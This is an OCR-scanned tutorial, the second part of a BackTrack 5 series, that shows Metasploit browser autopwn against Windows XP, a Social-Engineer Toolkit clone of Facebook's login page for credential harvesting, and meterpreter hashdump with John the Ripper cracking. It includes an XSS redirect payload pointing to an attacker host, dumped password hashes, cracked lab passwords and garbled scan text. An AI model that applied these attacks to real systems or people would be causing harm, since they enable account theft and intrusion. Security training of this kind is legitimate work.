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BackTrack 5 Guide II: Exploitation tools and frameworks 

Karthik R, Contributor 


You can read the original story_ here , on SearchSecurity.in. 

Looking for the basics of BackTrack 5? See here. 

In the first part of this BackTrack 5 guide, we looked at information gathering and 
vulnerability assessment tools. In the second part, we will use BackTrack 5 tools to 
exploit a remote system and learn how the exploitation framework can be used with the 
privilege escalation tool John the Ripper to crack passwords and gain access to a remote 
Windows system. 



Figure 1: Metasploit Armitage; The compromised remote Windows system is marked in 
red. The console below shows the browser autopwn process, exploits sent, data received, 
etc. Armitage also fingerprints the target OS, as seen in the screenshot. 
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Metasploit Armitage 

Metasploit Armitage is the GUI version of the famous Metasploit framework . We did an 
entire series of Metasploit tutorials on this site last month. In this part of BackTrack 5 
guide, we will look at the browser autopwn exploit for Windows XP using Metasploit 
Armitage. 

Features of this attack: 

1. Use of the auxiliary module of Metasploit Armitage 

2. Around 22 exploit modules used to carry out the attack 

3. Use of the social engineering approach 

4. Auto-migration to notepad.exe from the browser process 

For this exploit, you need a site with a cross-site scripting (XSS) URL redirection 
vulnerability. The victim clicks on a particular URL in the browser, which spawns a 
meterpreter shell in the victim's system. The URL redirection code will look something 
like: 

http://vulnerablesite?c="><meta HTTPEQUIV="REFRESH" content="0; 
url=http://attackerlPaddress "> 


3 about:blank - Microsoft Internet Explorer 


File Edit 

©Back 

Address 


View Favorites Tools Help 

T O T B @ fi | P 5ean:h ^Favorites ^ Media ^ 

http://www.xyz,com?c="><meta HTTPEQUIV="REFRE5H" content="0j url=http://192.168.13.132 ">| 



Figure 2: An illustration of URL redirection from an XSS vulnerable site, xyz.com, to 192.168.13.132 


The auto-migration feature is used to spawn the exploit into a new process, because if 
the exploit is not migrated, the whole attack will terminate when the user closes the 
browser. Migration is therefore done automatically to maintain prolonged access. 


Social-Engineer Toolkit 


The Social-Engineer Toolkit (SET) has been covered extensively in my previous article on 
this site. In this BackTrack 5 guide, I will discuss a type of attack called tab nabbing. In 
this attack, the victim opens a link in a browser, but as soon as he changes to another 
tab, the original page is replaced with a fake page, which allows attacker(s) to gain the 


http://searchs8curitv.techtarget.in/tip/BackTrack-5-Guide-ll-Exploitation-tools-and-frameworks 



TechTarget 











Page | 3 


>- SearchSecurity.in 

victim's login credentials. The victim is duped into entering his username and password 
on a fake site. 

In this "social engineering" attack, we choose a website attack vector and the option to 
clone the website. We specify the site to clone, whose login credentials we desire to 
obtain. I have cloned Facebook in this BackTrack 5 guide for demonstration purposes 
only*. Please note that cloning will not occur if you are not connected to the Internet 
during the process. 

Figure 3 of this guide shows the fake Facebook login page, and Figure 4 shows POST 
data captured by the SET. This method can be extended to any URL the attacker intends 
to clone; provided each of these sites have POST data, they will always be captured by 
FITTP or FITTPS. SET supports both these protocols and effectively sniffs login 
credentials. 



Facebook Login 


Email: 

Password: 


I 


□ Keep me logged in 

or Sign up for Facebook 

Forgot your password? 


English (US) 5TWT *k=rat gLfilLp dtorij aojcSLOgo Espanol Portugues (Brasil) Frangais (France) 


Facebook © 2011 


Mobile • Find Friends ■ Badges ■ People • Pages ■ About * Advertising ■ Create a Page ■ Developers ■ Careers • Privacy • Terms ■ Help 


Figure 3: A fake Facebook login page created by the Social Engineer Toolkit based on options set by 
the attacker 

Privilege escalation tools 

We may not always gain administrator or superuser access to a remote system. As an 
attacker, we need maximum privileges on the target to execute our payloads and 
perform desired actions. BackTrack 5 offers a wide range of privilege escalation tools to 
meet these needs, as shown in Figure 5 of this BackTrack 5 guide. 
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root@bt: /pentest/exploits/set 

File Edit View Terminal Help 

[*] Social-Engineer Toolkit Credential Harvester Attack 
[*] Credential Harvester is running on port Tin ~ ~~ ~ 

[*] Information will be displayed to you as it a rrives beiow 1 ^ 
192.168.13.1 - - [ 12/Oct/2011 16:40:14] "GET f HTTP/1.1" 28oJL 
192.168.13.1 - - [ 12/Oct/2011 16:40:24] "GET /inde**4lfml HTTP^y^Bfl^- 

PARAH: charset test=€, ',/k ,H,€ 

PARAH: lsd= 

PARAH: return session=0 
PARAH: legacy return=l 
PARAH: display= 

PARAH: session^key only=0 

PARAH: trvnun J m _ I 

PARAH: charset_test=€, ‘ ,1^,6 | 

PARAH: lsd= 


PARAH: default persistent=0 


Figure 4: POST Data captured by the Social Engineer Toolkit framework from a fake Facebook login 
page 

As seen in Figure 5 of this BackTrack 5 guide, BackTrack 5 offers four classes of privilege 
escalation tools, each with a specialized area of working. 

John the Ripper 


Once the victim has been compromised (please refer to my articles on SET and MsF for 
more details), the password cracker John the Ripper can be used to crack the Windows 
hashes to escalate privileges and gain administrator rights to the system. 

After exploitation, the hashes are dumped to a text file, and this text file is supplied to 
John the Ripper. John the Ripper is a very effective tool for cracking password hashes of 
remote systems once the hashes are available. Figures 6 and 7 of this BackTrack 5 guide 
show the cracking processes involved in privilege escalation on a Windows system. The 
attack demonstrated in this BackTrack 5 guide can be carried out with either the 
Metasploit Framework or the Social Engineer Toolkit. 
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The remote system in the observation in this BackTrack 5 guide uses the following set of 
usernames and passwords, as verified by John the Ripper in Figure 7. 
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Reverse Engineering 

► ^ Protocol Analysis 

► 

^ RFID Tools 

► |jf Spoofing Attacks 
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Figure 5: Various categories of privilege escalation tools in BackTrack 5 


meterpreter > hashdump fK 

Administrator:500:f0d412bd764ffe81aad3b435b51404ee:209c6174da490caeb422f3fa5a7ae 
634::: lk 

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0dl6ae931b73c59d7e0c089c0::: 
haxor:1007:b643941c69ac853eaad3b435b51404ee:0cl9516e460552a49bc0becf757f8f74::: 
HelpAssistant:J.000:d5cea586862d961444313a3f79233071:Idf4bccl6a8b05da47f0b8e45a5e 

cl24::: L. —. a 

IUSR_FACIEITATOR:1004:f20b82bd0978219f86c6e4f5e2a05cc7:cl05bcdae91502c41dll0a965 
fab8639::: 

IWAM FACILITATOR|||]1005:449fbl9918652a06a98e00499a4ba73c:5a575a012d86ae71164ddc4c 
cb58d72a::: 

metasploit:1008:728b8c8e407db950ade9ff10103574fe:e7266baa0b2c803c3e4e9c70ff50041 
f: : : 

SUPPORT 388945a0||5]1002:aad3b435b51404eeaad3b435b51404ee:04268f6f0a518e206a3e9951 
e4daf16f::: 

vv:1003:e52cac67419a9a224a3bl08f3fa6cb6d:8846f7eaee8fbll7ad06bdd83Ob7586c::: 
meterpreter > I 



Figure 6: The output of hashdump in the meterpreter shell which will be copied to a text file and 
supplied to John the Ripper for cracking. 
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Figure 7: Username: password combinations are as follows: metasploit:metasploit, w:password, 
haxor:haxor, administrator:admin 

With these passwords in hand, we can now escalate our privileges on the target system. 
In the protocol analysis category, we have Wireshark, a top class network traffic 
analyzer. I have previously covered the various applications of Wireshark in an earlier 
guide. 

It is evident from this guide that BackTrack 5 has evolved a lot in terms of its arsenal. A 
crafty attacker can make maximum use of these tools, and combine them to maximize 
his benefits. This BackTrack 5 guide highlights the most important exploitation and 
privilege escalation tools. In the BackTrack 5 guides to come, I will cover some more 
exploitation and privilege escalation techniques. 

Head, to the third part ofthis BackTrack 5 tutorial to learn more about exploitation 

frameworks. 


About the author: Karthik R is a member of the NULL community. 
Karthik completed his training for EC-council CEH in December 2010, 
and is at present pursuing his final year of B. Tech, in Information 
Technology, from National Institute of Technology, Surathkal. Karthik 
can be contacted on rkarthik.poojary@gmail.com. He blogs 
at httg^//www 1 egsilgnlgmbdgwygrdgres^ 





You can subscribe to our twitter feed at @SearchSeclN. You can read the original story 
here, on SearchSecurity.in. 
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